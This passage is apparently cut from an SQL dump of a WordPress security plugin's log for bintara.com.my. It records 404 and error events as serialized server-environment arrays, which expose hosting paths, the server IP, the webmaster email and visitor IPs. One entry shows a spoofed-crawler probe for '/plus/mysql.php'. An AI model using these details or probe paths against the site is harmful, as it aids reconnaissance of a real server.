deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/blog/portfolio/broadbase/\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/blog/portfolio/broadbase/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZokmKiTJz@X1M1HYIJOqQAAAEY\";s:12:\"REDIRECT_URL\";s:26:\"/blog/portfolio/broadbase/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.232\";s:11:\"REMOTE_PORT\";s:5:\"15092\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/blog/portfolio/broadbase/\";s:10:\"SCRIPT_URL\";s:26:\"/blog/portfolio/broadbase/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZokmKiTJz@X1M1HYIJOqQAAAEY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570383000.8338\";s:12:\"REQUEST_TIME\";s:10:\"1570383000\";}}','notice','2019-10-06 17:30:06','2019-10-06 17:30:01',34385864,36181304,'https://bintara.com.my/blog/portfolio/broadbase/',1,0,'157.55.39.232'),(27580,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570359837.6589710712432861328125\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570359837.6589710712432861328125\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570359837.6589710712432861328125\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1570359837.6589710712432861328125\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"33580\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570359837.6589710712432861328125\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZnKHTkjoKiPfp7KV-0cOAAAAQc\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZnKHTkjoKiPfp7KV-0cOAAAAQc\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"33580\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZnKHTkjoKiPfp7KV-0cOAAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570360752.6328\";s:12:\"REQUEST_TIME\";s:10:\"1570360752\";}}','notice','2019-10-06 11:19:33','2019-10-06 11:19:14',35065824,35318688,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1570359837.6589710712432861328125',1,0,'103.6.198.69'),(27581,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:63:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"86-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"5D414E16-C9B9-4B33-9445-528DE44DA82C\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"86-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZnSXvaSoa86rX5HNFPW@QAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"175.137.93.33\";s:11:\"REMOTE_PORT\";s:5:\"49339\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZnSXvaSoa86rX5HNFPW@QAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570361950.291\";s:12:\"REQUEST_TIME\";s:10:\"1570361950\";}}','notice','2019-10-06 11:39:13','2019-10-06 11:39:10',35794792,37590808,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.137.93.33'),(27840,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/mysql.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"241.12.202.78\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=a90f20c11998d1b28c84b124cd992c76\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"241.12.202.78\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mysql.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/mysql.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YseBT1onqG4TOWhlGIAAAARc\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mysql.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/mysql.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YseBT1onqG4TOWhlGIAAAARc\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mysql.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/mysql.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YseBT1onqG4TOWhlGIAAAARc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"50270\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/mysql.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/mysql.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YseBT1onqG4TOWhlGIAAAARc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674865.3271\";s:12:\"REQUEST_TIME\";s:10:\"1570674865\";}}','notice','2019-10-10 02:34:26','2019-10-10 02:34:25',35053480,36862168,'https://bintara.com.my/plus/mysql.php',1,0,'183.158.132.12'),(27532,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/ptz-pro/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/ptz-pro/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/ptz-pro/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZhRYUIBnEjhLICWLzNw2QAAAQQ\";s:12:\"REDIRECT_URL\";s:9:\"/ptz-pro/\";s:11:\"REMOTE_ADDR\";s:12:\"207.46.13.54\";s:11:\"REMOTE_PORT\";s:4:\"4418\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/ptz-pro/\";s:10:\"SCRIPT_URL\";s:9:\"/ptz-pro/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZhRYUIBnEjhLICWLzNw2QAAAQQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570263393.7182\";s:12:\"REQUEST_TIME\";s:10:\"1570263393\";}}','notice','2019-10-05 08:16:38','2019-10-05 08:16:34',34367264,36163200,'https://bintara.com.my/ptz-pro/',1,0,'207.46.13.54'),(27533,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:63:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"197-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"4B506E3D-993F-406B-A451-058923B265B9\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"197-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZhboEGaeXEybixQimRMCAAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.136.131.110\";s:11:\"REMOTE_PORT\";s:5:\"49801\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZhboEGaeXEybixQimRMCAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570266017.1456\";s:12:\"REQUEST_TIME\";s:10:\"1570266017\";}}','notice','2019-10-05 09:00:19','2019-10-05 09:00:17',35792392,37589200,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.136.131.110'),(27534,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.128.136\";s:11:\"REMOTE_PORT\";s:5:\"57356\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";